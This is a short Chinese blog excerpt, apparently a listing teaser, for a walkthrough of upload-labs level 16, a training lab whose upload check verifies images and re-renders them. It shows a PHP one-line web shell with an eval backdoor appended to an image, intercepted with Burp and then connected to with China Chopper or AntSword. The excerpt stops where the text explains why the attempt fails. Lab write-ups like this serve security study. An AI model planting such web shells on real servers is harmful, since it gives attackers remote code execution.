upload-labs第16关(判断照片后二次渲染)详解
upload-labs16关-详解(判断是否为照片后进行二次渲染)首先看一下源码首先我们像前面关卡一样,上传图片马,按照我们的习惯,将会在图片的尾部,写入php一句话木马,然后用菜刀或者蚁剑连接,我们先按照此方法进行试验(1)上传图片马(2)用burp拦截,拦截到上传的包(3)在图片尾部插入一句话木马,密码是123<?php @eval($_POST[123]); ?>放包上传(4)将图片地址复制下来,用菜刀连接,密码设置的是123发现连接失败原因是照片上传后
原创
2020-10-25 13:33:22 ·
2379 阅读 ·
1 评论